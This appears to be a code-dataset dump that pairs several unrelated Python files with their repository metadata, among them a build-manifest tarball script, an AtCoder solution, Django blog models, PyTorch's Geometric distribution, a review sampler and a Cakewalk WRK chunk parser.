'RELEASE': self.release,
'PRODUCT_BRANCH': self.product_branch,
'VERSION': self.version,
'BLD_NUM': self.build_num,
'MANIFEST': str(self.manifest),
'PARENT': self.parent,
'TYPE': self.type,
'BUILD_JOB': self.build_job,
'FORCE': self.force
}
with open(self.output_files['build-properties.json'], 'w') as fh:
json.dump(properties, fh, indent=2, separators=(',', ': '))
with open(self.output_files['build.properties'], 'w') as fh:
fh.write(f'PRODUCT={self.product}\nRELEASE={self.release}\n'
f'PRODUCT_BRANCH={self.product_branch}\n'
f'VERSION={self.version}\nBLD_NUM={self.build_num}\n'
f'MANIFEST={self.manifest}\nPARENT={self.parent}\n'
f'TYPE={self.type}\nBUILD_JOB={self.build_job}\n'
f'FORCE={self.force}\n')
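    # For illustration only, the resulting build.properties is a flat
    # INI-style file; the values below are hypothetical examples:
    #   PRODUCT=couchbase-server
    #   RELEASE=6.5.0
    #   VERSION=6.5.0
    #   BLD_NUM=1234
    #   MANIFEST=couchbase-server/mad-hatter.xml
    #   BUILD_JOB=couchbase-server-build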
def create_tarball(self):
"""
Create the source tarball from the repo sync and generated
files (new manifest and CHANGELOG). Avoid copying the .repo
information, and only copy the .git directory if specified.
"""
tarball_filename = self.output_files['source.tar']
targz_filename = self.output_files['source.tar.gz']
print(f'Creating {tarball_filename}')
product_dir = pathlib.Path(self.product)
with pushd(product_dir):
with tarfile.open(tarball_filename, 'w') as tar_fh:
                for root, dirs, files in os.walk('.'):
                    # Prune .repo and .git in place so os.walk never descends
                    # into them (removing entries while iterating over `dirs`
                    # can silently skip the entry after a removed one)
                    dirs[:] = [d for d in dirs if d not in ('.repo', '.git')]
                    for name in files:
                        tar_fh.add(os.path.join(root, name)[2:])
                    for name in dirs:
                        tar_fh.add(os.path.join(root, name)[2:],
                                   recursive=False)
if self.manifest_config.get('keep_git', False):
print(f'Adding Git files to {tarball_filename}')
# When keeping git files, need to dereference symlinks
# so that the resulting .git directories work on Windows.
# Because of this, we don't save the .repo directory
# also, as that would double the size of the tarball
# since mostly .repo just contains git dirs.
with tarfile.open(tarball_filename, "a",
dereference=True) as tar:
for root, dirs, files in os.walk('.', followlinks=True):
for name in dirs:
if name == '.repo':
dirs.remove(name)
elif name == '.git':
tar.add(os.path.join(root, name)[2:],
recursive=False)
if '/.git' in root:
for name in files:
# Git (or repo) sometimes creates broken
# symlinks, like "shallow", and Python's
# tarfile module chokes on those
if os.path.exists(os.path.join(root, name)):
tar.add(os.path.join(root, name)[2:],
recursive=False)
print(f'Compressing {tarball_filename}')
with open(tarball_filename, 'rb') as f_in, \
gzip.open(targz_filename, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
os.unlink(tarball_filename)
def generate_final_files(self):
"""
Generate the new files needed, which are:
- new build manifest
- properties files (JSON and INI-style)
- source tarball (which includes the manifest)
"""
self.copy_build_manifest()
self.create_properties_files()
self.create_tarball()
def create_manifest(self):
"""
The orchestration method to handle the full program flow
from a high-level overview. Summary:
- Prepare for various key files, removing any old ones
- Determine the product information from the config files
- Setup manifest repository and determine build information
from it
- If there are submodules, ensure they're updated
        - Set the relevant and necessary parameters (e.g. version)
- Do a repo sync based on the given manifest
- Update the build-manifests repository and determine
the next build number to use
- Generate the CHANGELOG and update the build manifest
annotations
- Push the generated manifest to build-manifests, if
pushing is requested
- Generate the new build manifest, properties files, and
source tarball
"""
self.prepare_files()
self.determine_product_info()
self.do_manifest_stuff()
module_projects = self.manifest_config.get('module_projects')
if module_projects is not None:
self.update_submodules(module_projects)
self.set_relevant_parameters()
self.set_build_parameters()
self.perform_repo_sync()
self.update_bm_repo_and_get_build_num()
with pushd(self.product):
self.generate_changelog()
commit_msg = self.update_build_manifest_annotations()
self.push_manifest(commit_msg)
self.generate_final_files()
def parse_args():
"""Parse and return command line arguments"""
parser = argparse.ArgumentParser(
description='Create new build manifest from input manifest'
)
parser.add_argument('--manifest-project', '-p',
default='git://github.com/minddrive/manifest.git',
help='Alternate Git URL for manifest repository')
parser.add_argument('--build-manifests-org', default='minddrive',
help='Alternate GitHub organization for '
'build-manifests')
parser.add_argument('--force', '-f', action='store_true',
help='Produce new build manifest even if there '
'are no repo changes')
parser.add_argument('--no-push', action='store_true',
help='Do not push final build manifest')
parser.add_argument('manifest', help='Path to input manifest')
return parser.parse_args()
def main():
"""Initialize manifest builder object and trigger the build"""
manifest_builder = ManifestBuilder(parse_args())
manifest_builder.create_manifest()
if __name__ == '__main__':
main()
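# Example invocation (the manifest path is hypothetical; a minimal sketch):
#   ./build_from_manifest.py --no-push couchbase-server/mad-hatter.xml
# On success this leaves build.properties, build-properties.json,
# build-manifest.xml, CHANGELOG and source.tar.gz in the working directory.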
|
[
"[email protected]"
] | |
3387a7b1ab5c092a4be3f73958c4f37a2aec6a5c
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02683/s728076842.py
|
530d406c4a8a8bf681c980d60d4d26bc44d72770
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 390 |
py
|
import numpy as np
n,m,x=map(int,input().split())
a=2**64
b=[np.array(list(map(int,input().split())),"i8")for i in range(n)]
for i in range(2**n):
c=bin(i)[2:]
c="0"*(n-len(c))+c
l=np.zeros(m)
q=0
for j in range(n):
if c[j]=="1":
q+=b[j][0]
l+=b[j][1:]
if np.min(l)>=x:
a=min(a,q)
if a==2**64:
print(-1)
else:
print(a)
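# Hand-checked example: for the input
#   2 1 10
#   5 10
#   3 4
# buying only the first book (cost 5) already reaches level 10 >= x,
# so the program prints 5.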
|
[
"[email protected]"
] | |
d9e7c56938990536056e245fd9a4e8f269ca531c
|
a54aaaf50c84b8ffa48a810ff9a25bfe8e28ba96
|
/euler017.py
|
7b50a537c65bdf4546e8de4b9c5b747a69368e15
|
[] |
no_license
|
danielmmetz/euler
|
fd5faefdfd58de04e744316618f43c40e6cbb288
|
fe64782617d6e14b8b2b65c3a039716adb789997
|
refs/heads/master
| 2021-01-17T08:44:26.586954 | 2016-05-12T02:35:10 | 2016-05-12T02:35:10 | 40,574,287 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 885 |
py
|
"""
If the numbers 1 to 5 are written out in words: one, two, three, four, five,
then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.
If all the numbers from 1 to 1000 (one thousand) inclusive were written out in
words, how many letters would be used?
NOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-
two) contains 23 letters and 115 (one hundred and fifteen) contains 20 letters.
The use of "and" when writing out numbers is in compliance with British usage.
"""
from collections import Counter
from num2words import num2words
from string import ascii_lowercase as letters
def answer(bound):
char_counts = Counter()
for num in xrange(1, bound+1):
char_counts += Counter(char for char in num2words(num, lang='en_GB'))
return sum(char_counts[char] for char in letters)
if __name__ == '__main__':
print answer(1000)
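# Sanity check from the problem statement (Python 2 syntax, left commented):
# print answer(5)  # -> 19, i.e. 3 + 3 + 5 + 4 + 4 letters for one..five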
|
[
"[email protected]"
] | |
21fb9340d7f32f6154426ff550bec28acbfdafb6
|
203d90b6f0a0fe38cf6a77d50c6e5aa528e4d50d
|
/blog/models.py
|
4398a5455471cb25c799d12afc32868947063c59
|
[] |
no_license
|
leayl/mysite
|
dcc92bedc27b6206ec566f5b4421ee517a838ddd
|
b7974ce9fffe5c4f61d1c0d4facdd7c7860c0204
|
refs/heads/master
| 2021-06-23T23:53:39.046179 | 2019-09-23T03:51:45 | 2019-09-23T03:51:45 | 181,919,893 | 0 | 0 | null | 2021-06-10T21:23:46 | 2019-04-17T15:31:54 |
Python
|
UTF-8
|
Python
| false | false | 1,109 |
py
|
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields import exceptions
from django.contrib.auth.models import User
from ckeditor_uploader.fields import RichTextUploadingField
from read_statistics.models import ReadNumExtendMethod
class BlogType(models.Model):
title = models.CharField(max_length=32)
def __str__(self):
return self.title
class Blog(models.Model,ReadNumExtendMethod):
"""
    Inherits ReadNumExtendMethod from read_statistics.models, which provides
    the get_read_num method; it can be used directly in the Django admin
    to show read counts in the backend.
"""
title = models.CharField(max_length=32)
blog_type = models.ForeignKey(BlogType, on_delete=models.DO_NOTHING)
content = RichTextUploadingField()
author = models.ForeignKey(User, on_delete=models.DO_NOTHING)
# read_times = models.IntegerField(default=0)
created_time = models.DateTimeField(auto_now_add=True)
last_update_time = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Meta:
ordering=['-created_time']
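# Usage sketch (assumes a BlogType and a User already exist; the names below
# are illustrative only):
# blog = Blog.objects.create(title='First post', blog_type=some_type,
#                            content='<p>hello</p>', author=some_user)
# blog.get_read_num()  # provided by ReadNumExtendMethod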
|
[
"[email protected]"
] | |
8bab37daf96d71aa280e74d681d7515f1291bf03
|
c9f67529e10eb85195126cfa9ada2e80a834d373
|
/lib/python3.5/site-packages/torch/distributions/geometric.py
|
1e4b121cd7b4cfcccd548bf86ff634e3392b7ebe
|
[
"Apache-2.0"
] |
permissive
|
chilung/dllab-5-1-ngraph
|
10d6df73ea421bfaf998e73e514972d0cbe5be13
|
2af28db42d9dc2586396b6f38d02977cac0902a6
|
refs/heads/master
| 2022-12-17T19:14:46.848661 | 2019-01-14T12:27:07 | 2019-01-14T12:27:07 | 165,513,937 | 0 | 1 |
Apache-2.0
| 2022-12-08T04:59:31 | 2019-01-13T14:19:16 |
Python
|
UTF-8
|
Python
| false | false | 2,923 |
py
|
from numbers import Number
import torch
from torch.distributions import constraints
from torch.distributions.distribution import Distribution
from torch.distributions.utils import broadcast_all, probs_to_logits, logits_to_probs, lazy_property, _finfo
from torch.nn.functional import binary_cross_entropy_with_logits
class Geometric(Distribution):
r"""
Creates a Geometric distribution parameterized by `probs`, where `probs` is the probability of success of Bernoulli
trials. It represents the probability that in k + 1 Bernoulli trials, the first k trials failed, before
seeing a success.
Samples are non-negative integers [0, inf).
Example::
>>> m = Geometric(torch.tensor([0.3]))
>>> m.sample() # underlying Bernoulli has 30% chance 1; 70% chance 0
2
[torch.FloatTensor of size 1]
Args:
        probs (Number, Tensor): the probability of sampling `1`. Must be in range (0, 1]
logits (Number, Tensor): the log-odds of sampling `1`.
"""
arg_constraints = {'probs': constraints.unit_interval}
support = constraints.nonnegative_integer
def __init__(self, probs=None, logits=None, validate_args=None):
if (probs is None) == (logits is None):
raise ValueError("Either `probs` or `logits` must be specified, but not both.")
if probs is not None:
self.probs, = broadcast_all(probs)
if not self.probs.gt(0).all():
raise ValueError('All elements of probs must be greater than 0')
else:
self.logits, = broadcast_all(logits)
probs_or_logits = probs if probs is not None else logits
if isinstance(probs_or_logits, Number):
batch_shape = torch.Size()
else:
batch_shape = probs_or_logits.size()
super(Geometric, self).__init__(batch_shape, validate_args=validate_args)
@property
def mean(self):
return 1. / self.probs - 1.
@property
def variance(self):
return (1. / self.probs - 1.) / self.probs
@lazy_property
def logits(self):
return probs_to_logits(self.probs, is_binary=True)
@lazy_property
def probs(self):
return logits_to_probs(self.logits, is_binary=True)
def sample(self, sample_shape=torch.Size()):
shape = self._extended_shape(sample_shape)
with torch.no_grad():
u = self.probs.new(shape).uniform_(_finfo(self.probs).tiny, 1)
return (u.log() / (-self.probs).log1p()).floor()
def log_prob(self, value):
if self._validate_args:
self._validate_sample(value)
value, probs = broadcast_all(value, self.probs.clone())
probs[(probs == 1) & (value == 0)] = 0
return value * (-probs).log1p() + self.probs.log()
def entropy(self):
return binary_cross_entropy_with_logits(self.logits, self.probs, reduce=False) / self.probs
|
[
"[email protected]"
] | |
380d17872d9ed8769bac3610758bd177dacef41e
|
49b9c68ab746cb43770fd35771847bd9c18817e6
|
/recsys/experiment/sampler.py
|
f5ab7aa89849497d96e70142acbc65112590a16a
|
[] |
no_license
|
kobauman/signature
|
06a2c579381faa780d79ab3e662c6ec6d28b8555
|
d123ff1557b9d3f81ef7ce7a0a83ea81d614675b
|
refs/heads/master
| 2021-01-21T12:11:42.419877 | 2016-03-25T19:48:08 | 2016-03-25T19:48:08 | 22,729,978 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,290 |
py
|
import logging
import random
import json
import os
'''
Sample TRAIN and TEST
Input: results path, reviews file, split probabilities, and minimum
       review-count thresholds for businesses and users
Output: *_train.json, *_stat.json, *_extrain.json and *_test.json files
        written alongside the input, plus results/Numbers_stat.txt
'''
def sampler(path, reviews_filename, probs = [0.4, 0.8], busThres = 0, userThres = 0):
logger = logging.getLogger('signature.sampler')
logger.info('starting sampling')
#load reviews
review_file = open(reviews_filename,"r")
bus_info = dict()
user_info = dict()
reviews = list()
for counter, line in enumerate(review_file):
reviews.append(json.loads(line))
busId = reviews[-1]['business_id']
userId = reviews[-1]['user_id']
bus_info[busId] = bus_info.get(busId,0)
bus_info[busId]+=1
user_info[userId] = user_info.get(userId,0)
user_info[userId]+=1
if not counter %10000:
logger.info('%d reviews processed'%counter)
review_file.close()
r_num = len(reviews)
    # filter out businesses and users with too few reviews
good_bus = set([bus for bus in bus_info if bus_info[bus] > busThres])
reviews = [review for review in reviews if review['business_id'] in good_bus]
good_user = set([user for user in user_info if user_info[user] > userThres])
reviews = [review for review in reviews if review['user_id'] in good_user]
logger.info('Num of businesses before = %d, after = %d'%(len(bus_info),len(good_bus)))
logger.info('Num of users before = %d, after = %d'%(len(user_info),len(good_user)))
logger.info('Num of reviews before = %d, after = %d'%(r_num,len(reviews)))
#shuffle
random.shuffle(reviews)
thres1 = len(reviews)*probs[0]
thres2 = len(reviews)*probs[1]
train_filename = reviews_filename.replace('_features.json','_train.json')
stat_filename = reviews_filename.replace('_features.json','_stat.json')
extrain_filename = reviews_filename.replace('_features.json','_extrain.json')
test_filename = reviews_filename.replace('_features.json','_test.json')
train_file = open(train_filename,"w")
stat_file = open(stat_filename,"w")
extrain_file = open(extrain_filename,"w")
test_file = open(test_filename,"w")
counters = [0,0,0,0]
for counter, review in enumerate(reviews):
review = json.dumps(review)
if counter < thres2:
train_file.write(review+'\n')
counters[0] += 1
if counter < thres1:
stat_file.write(review+'\n')
counters[1] += 1
elif counter < thres2:
extrain_file.write(review+'\n')
counters[2] += 1
else:
test_file.write(review+'\n')
counters[3] += 1
train_file.close()
stat_file.close()
extrain_file.close()
test_file.close()
logger.info('DONE %s'%str(counters))
try:
os.stat(path+'results/')
except:
os.mkdir(path+'results/')
outfile = open(path+'results/Numbers_stat.txt','w')
outfile.write('Businesses only with > %d reviews\nUsers only with > %d reviews'%(busThres,userThres))
outfile.write('\nTrain: %d,\n Stat: %d,\nExtrain: %d,\nTest: %d'%(counters[0],counters[1],counters[2],counters[3]))
outfile.close()
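# Usage sketch (hypothetical paths; the input file is expected to hold one
# JSON review per line, as read above):
# sampler('/data/yelp/', '/data/yelp/restaurants_features.json',
#         probs=[0.4, 0.8], busThres=5, userThres=3)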
|
[
"[email protected]"
] | |
06ebfc7c0dd8d9fa2e442b989356c0541f537915
|
e4eca3e87148f9afc93233b13c54c5e065f704b1
|
/pyMRA/multiprocess/example.py
|
6729aaca6a0ed1bb1006d371176603e55628d452
|
[
"MIT"
] |
permissive
|
katzfuss-group/pyMRA
|
51dddfcba457e5ebf76f6a9bbe69d7efa2208cb4
|
6214f2a89b5abb6dce3f3187692bea88874a4649
|
refs/heads/master
| 2021-04-03T04:12:37.142914 | 2018-03-09T15:40:35 | 2018-03-09T15:40:35 | 124,594,147 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,749 |
py
|
import multiprocessing
import sys
import re
class ProcessWorker(multiprocessing.Process):
"""
This class runs as a separate process to execute worker's commands in parallel
Once launched, it remains running, monitoring the task queue, until "None" is sent
"""
def __init__(self, task_q, result_q):
multiprocessing.Process.__init__(self)
self.task_q = task_q
self.result_q = result_q
return
def run(self):
"""
Overloaded function provided by multiprocessing.Process. Called upon start() signal
"""
proc_name = self.name
print( '%s: Launched' % (proc_name))
while True:
next_task_list = self.task_q.get()
            if next_task_list is None:
# Poison pill means shutdown
print('%s: Exiting' % (proc_name))
self.task_q.task_done()
break
next_task = next_task_list[0]
print( '%s: %s' % (proc_name, next_task))
args = next_task_list[1]
kwargs = next_task_list[2]
answer = next_task(*args, **kwargs)
self.task_q.task_done()
self.result_q.put(answer)
return
# End of ProcessWorker class
class Worker(object):
"""
Launches a child process to run commands from derived classes in separate processes,
which sit and listen for something to do
This base class is called by each derived worker
"""
def __init__(self, config, index=None):
self.config = config
self.index = index
        # Launch the ProcessWorker for anything that has an index value
if self.index is not None:
self.task_q = multiprocessing.JoinableQueue()
self.result_q = multiprocessing.Queue()
self.process_worker = ProcessWorker(self.task_q, self.result_q)
self.process_worker.start()
print( "Got here")
# Process should be running and listening for functions to execute
return
def enqueue_process(target): # No self, since it is a decorator
"""
        Used to place a command target from this class object into the task_q
NOTE: Any function decorated with this must use fetch_results() to get the
target task's result value
"""
def wrapper(self, *args, **kwargs):
self.task_q.put([target, args, kwargs]) # FAIL: target is a class instance method and can't be pickled!
return wrapper
def fetch_results(self):
"""
After all processes have been spawned by multiple modules, this command
        is called on each one to retrieve the results of the call.
This blocks until the execution of the item in the queue is complete
"""
        self.task_q.join()                     # Wait for it to finish
return self.result_q.get() # Return the result
@enqueue_process
def run_long_command(self, command):
print( "I am running number % as process "%number, self.name )
# In here, I will launch a subprocess to run a long-running system command
# p = Popen(command), etc
# p.wait(), etc
return
def close(self):
self.task_q.put(None)
self.task_q.join()
if __name__ == '__main__':
config = ["some value", "something else"]
index = 7
workers = []
for i in range(5):
worker = Worker(config, index)
worker.run_long_command("ls /")
workers.append(worker)
for worker in workers:
worker.fetch_results()
# Do more work... (this would actually be done in a distributor in another class)
for worker in workers:
worker.close()
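# A possible workaround for the pickling FAIL flagged above (a sketch, not
# the original author's solution): enqueue a picklable payload such as the
# target method's *name* plus its arguments, and resolve it with getattr()
# on an object that already lives in the child process, e.g.
#   self.task_q.put([target.__name__, args, kwargs])
# instead of putting the bound method itself on the queue.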
|
[
"[email protected]"
] | |
66232ac70c2956a0cdd7e2de1e6855bd119e53dc
|
1d7147717ed51c34d09e2f68dbb9c746245b147d
|
/L2C1_project1.py
|
41a63402d6406d1ff1fa10de3b486ec6827f66ba
|
[] |
no_license
|
aaryanredkar/prog4everybody
|
987e60ebabcf223629ce5a80281c984d1a7a7ec2
|
67501b9e9856c771aea5b64c034728644b25dabe
|
refs/heads/master
| 2020-05-29T18:12:33.644086 | 2017-02-13T02:46:44 | 2017-02-13T02:46:44 | 46,829,424 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 90 |
py
|
x = int(input("Please enter an integer:"))
print()
for i in range(0,x + 1):
print (i)
|
[
"[email protected]"
] | |
ddd780af0f467b3e365ab91cc4e73b3afe4f785c
|
b58c3f5b69772d5383727b8257536ab41a29cd02
|
/testsuites/test03_shopmanage.py
|
c3344499a4f13305952624af0de7a9e677e12957
|
[] |
no_license
|
pwxing/LinkeDs
|
b25fe937100b352f00f152306f7b15691c69f41e
|
2f996a70cd611eef27a826ae7ded38104e292374
|
refs/heads/master
| 2021-05-07T18:36:27.877468 | 2017-11-02T12:20:34 | 2017-11-02T12:20:34 | 108,817,025 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,936 |
py
|
# coding=utf-8
import time
import unittest
from framework.browser_engine import BrowserEngine
from framework.base_page import BasePage
from pageobjects.linke_loginpage import LoginPage
from pageobjects.linke_homepage import LinkeHomePage
from pageobjects.ds_shopmanage import ShopManage
import pageobjects
class ShopManageTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
browse = BrowserEngine(cls)
cls.driver = browse.open_browser(cls)
@classmethod
def tearDownClass(cls):
# cls.driver.quit()
pass
def test_ds_menu001(self):
# self.login()
loginpage = LoginPage(self.driver)
loginpage.login()
time.sleep(1)
        loginpage.get_windows_img()  # Call the base-class screenshot helper
        # Click the e-commerce (DS) entry button
linkehomepage = LinkeHomePage(self.driver)
time.sleep(1)
linkehomepage.send_ds_link_btn()
time.sleep(1)
shopmanage = ShopManage(self.driver)
print shopmanage.get_y_order_text()
print shopmanage.get_y_amount_text()
print shopmanage.get_no_send_text()
print shopmanage.get_prepare_goods_text()
print shopmanage.get_refund_text()
shopmanage.click_y_order()
time.sleep(1)
self.driver.back()
time.sleep(1)
shopmanage.click_ds_info()
time.sleep(1)
shopmanage.click_ds_info()
        # Select the query time range
        shopmanage.type_select_query_time(u"近一周")    # "past week"
        time.sleep(2)
        shopmanage.type_select_query_time(u"近一月")    # "past month"
        time.sleep(2)
        shopmanage.type_select_query_time(u"昨天")      # "yesterday"
        time.sleep(2)
        shopmanage.type_select_query_time(u"自定义时间")  # "custom time range"
time.sleep(2)
shopmanage.type_cus_time("2017-07-20", "2017-07-25")
time.sleep(1)
shopmanage.click_query_btn()
time.sleep(2)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
7d4360c378c244e4834437c6bf0bbf020e1885ff
|
b85bca40004f9d1737fb4d342e8ea040eefb453b
|
/tests/lgdo/test_scalar.py
|
3ff4c51833af64977b65fb3570d064c5a0fc7ac5
|
[
"Apache-2.0"
] |
permissive
|
wisecg/pygama
|
95f744af56a8df81020f195695128a5ce0a6aca6
|
9a422d73c20e729f8d014a120a7e8714685ce4db
|
refs/heads/main
| 2022-12-24T02:02:05.554163 | 2022-12-05T16:32:30 | 2022-12-05T16:32:30 | 257,975,470 | 0 | 1 |
Apache-2.0
| 2020-04-22T17:41:46 | 2020-04-22T17:41:45 | null |
UTF-8
|
Python
| false | false | 468 |
py
|
import pygama.lgdo as lgdo
def test_datatype_name():
scalar = lgdo.Scalar(value=42)
assert scalar.datatype_name() == "real"
def test_form_datatype():
scalar = lgdo.Scalar(value=42)
assert scalar.form_datatype() == "real"
# TODO: check for warning if mismatched datatype
def test_init():
attrs = {"attr1": 1}
scalar = lgdo.Scalar(value=42, attrs=attrs)
assert scalar.value == 42
assert scalar.attrs == attrs | {"datatype": "real"}
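# Sketch for the TODO above (assumes a warning is emitted on a datatype
# mismatch; the warning category is an assumption, so this stays commented):
# import pytest
# def test_mismatched_datatype_warns():
#     with pytest.warns(UserWarning):
#         lgdo.Scalar(value=42, attrs={"datatype": "string"})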
|
[
"[email protected]"
] | |
e95bf537e32a24dacce0ab8d8e392fff4ac0c249
|
cda2cbe020f70db1bfc645973a9c1e3c62e18e92
|
/ex24.py
|
5248ea0c9a8da0dd9d98ea9ece2a571e9aa3f114
|
[] |
no_license
|
SpaceOtterInSpace/Learn-Python
|
a22c27a8fc4d955a309b8248d7e34b8957eecf24
|
3f8cc6b6212449ef3f2148e66bce9d83f23191dc
|
refs/heads/master
| 2020-04-20T16:29:46.282166 | 2015-07-07T20:04:36 | 2015-07-07T20:04:36 | 35,775,230 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 916 |
py
|
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
and requires an explanation
\n\t\twhere there is none.
"""
print "----------"
print poem
print "----------"
five = 10 - 2 + 3 - 6
print "This should be five: %s" % five
def secret_formula(started):
jelly_beans = started * 500
jars = jelly_beans / 1000
crates = jars / 100
return jelly_beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
print "With a starting point of: %d" % start_point
print "We'd have %d beans, %d jars, and %d crates." % (beans, jars, crates)
start_point = start_point / 10
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crates." % secret_formula(start_point)
|
[
"[email protected]"
] | |
fee23db67ca1b01428550a6fd45ebdf1149b381a
|
19a86ab59d3ab02103a0b12c2cb4eebdcf028679
|
/app.py
|
40f11fd05d7032f13ce823d7e818a763ff66e0a8
|
[] |
no_license
|
npvandyke/surfs_up
|
e5acee499baa6a51b4bf19d9ee6d551de8ac1a70
|
e9f5a59db7aec07a9e756a105a54f539dee6f04b
|
refs/heads/main
| 2023-03-29T17:48:34.057067 | 2021-04-01T22:11:33 | 2021-04-01T22:11:33 | 350,831,329 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 217 |
py
|
# Import dependency
from flask import Flask
# Create a new Flask app instance
app = Flask(__name__)
# Define the starting point (root) of the first route
@app.route('/')
def hello_world():
return 'Hello world'
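# Minimal way to run the app locally (a sketch; the debug flag is an
# assumption, not part of the original file):
# if __name__ == '__main__':
#     app.run(debug=True)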
|
[
"[email protected]"
] | |
6aaba7d662a21da85d2ba3e6b178f7ecf8d58cd2
|
e7b07f173a8bc0d36e046c15df7bbe3d18d49a33
|
/parse.py
|
9d1894ef9159fb1b51738dbba15b24d5bcb61bc0
|
[] |
no_license
|
jcarbaugh/makeitwrk
|
82b6e8079b118e8d668b2e6858096a54da33d5a8
|
83801b19c120b4cf728b8342c4933fefe54b54d8
|
refs/heads/master
| 2020-04-06T04:55:56.785930 | 2011-08-26T19:09:27 | 2011-08-26T19:09:27 | 2,275,931 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,029 |
py
|
#!/usr/bin/env python
from struct import pack, unpack
import sys
CHUNK_TYPES = {
1: 'TRACK_CHUNK',
2: 'STREAM_CHUNK',
4: 'METER_CHUNK',
5: 'TEMPO_CHUNK',
6: 'SYSEX_CHUNK',
7: 'MEMRGN_CHUNK',
10: 'TIMEBASE_CHUNK',
# variables
3: 'VARS_CHUNK',
26: 'VARS_CHUNK_VAR',
# device stuff
33: 'DEVICES',
# track stuff?
36: 'TRACK_NAME?',
54: 'TRACK_PORT',
45: 'TRACK_DATA?',
255: 'END_CHUNK',
}
def solomon(arr, parts):
for i in range(0, parts * 8, 8):
yield arr[i:i+8]
def chunk_reader(wrkfile):
if wrkfile.read(8) != b'CAKEWALK':
raise ValueError('invalid file format')
wrkfile.read(1) # byte I don't care about
mm_version = wrkfile.read(2)
    # read(2) returns bytes, so indexing already yields integers in Python 3
    major = mm_version[1]
    minor = mm_version[0]
version = "%i.%i" % (major, minor)
yield ('VERSION_CHUNK', 2, None, version)
while 1:
ch_type_data = wrkfile.read(1)[0]
ch_type = CHUNK_TYPES.get(ch_type_data, ch_type_data)
if ch_type == 'END_CHUNK':
break
ch_len = unpack('i', wrkfile.read(4))[0]
ch_data_offset = wrkfile.tell()
#print(ch_data_offset)
ch_data = wrkfile.read(ch_len)
yield (ch_type, ch_len, ch_data)
yield ('END_CHUNK', None, None, None)
wrkfile.close()
if __name__ == '__main__':
    for chunk in chunk_reader(sys.stdin.buffer):  # binary stdin for byte-level reads
print(chunk)
# if chunk[0] == 'TRACK_NAME?':
# (tnum, tname_len) = unpack('HB', chunk[2][:3])
# tname = chunk[2][3:3+tname_len].decode('utf-8')
# print("[%02i] %s" % (tnum, tname))
# elif chunk[0] == 'TRACK_DATA?':
# (tnum, schunks) = unpack('=HxH', chunk[2][:5])
# print(' ', '------------')
# for s in solomon(chunk[2][7:], schunks):
# print(' ', unpack('8B', s))
"""
__TRACK_DATA__
#2 ?? CNT- ???? 16---------------
0900 00 0700 0000 B649 009023641E00 D449 009028643C00 104A 00902B643C00 4C4A 009029643C00 884A 009023641E00 A64A 009023641E00 E24A 009023641E00
0900 00 0700 0000 1E4B 009023641E00 3C4B 009028643C00 784B 00902B643C00 B44B 009029643C00 F04B 009023641E00 0E4C 009023641E00 4A4C 009023641E00
(30, 75, 0, 144, 35, 100, 30, 0)
submeasure . . . .
measure. . . .
? . . . .
? . . .
nt? . .
? .
-----?
------------------------------------
0000 00 0800 0000 E010 009045643C00 1C11 009045643C00 5811 00904C643C00 9411 009045643C00 D011 00904D643C00 0C12 00904C643C00 4812 009048643C00 8412 009045643C00
0200 00 1400 0000 8016 00902664E001 3417 009026643C00 7017 009026647800 E817 009026647800 2418 009026643C00 6018 00902264E001 1419 009022643C00 5019 009022647800 C819 009022647800041A009022643C00401A00901F64E001F41A00901F643C00301B00901F647800A81B00901F647800E41B00901F643C00201C00902164E001D41C009021643C00101D009021647800881D009021647800C41D009021643C00
__TRACK_NAME__
#2 L2 NAME* INSTRUMENT?
0000 05 4F7267616E FFFF 1500 FFFFFFFF 00000000000000 0A 0000000000
O R G A N
0100 0B 536C617020426173732031 FFFF 2500 FFFFFFFF 00000000000000 0A 0000010000
S L A P B A S S 1
0200 0B 536C617020426173732032 FFFF 2400 FFFFFFFF 00000000000000 FE 0000020000
S L A P B A S S 2
0300 0C 4869676820537472696E6773 FFFF 2C00 FFFFFFFF 00000000000000 0A 0000030000
H I G H S T R I N G S
0900 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
-------------------------------------------
0000 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
"""
|
[
"[email protected]"
] | |
59fafc2d56a1ca1d9d3712f7dfda2784a96c910b
|
71c331e4b1e00fa3be03b7f711fcb05a793cf2af
|
/QA-System-master/SpeechToText_test/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/recaptchaenterprise/v1/recaptchaenterprise_v1_client.py
|
79510bf7357cd70baba2a7b3f103d23cabd30234
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
iofh/QA-System
|
568228bb0c0adf9ec23b45cd144d61049e720002
|
af4a8f1b5f442ddf4905740ae49ed23d69afb0f6
|
refs/heads/master
| 2022-11-27T23:04:16.385021 | 2020-08-12T10:11:44 | 2020-08-12T10:11:44 | 286,980,492 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,467 |
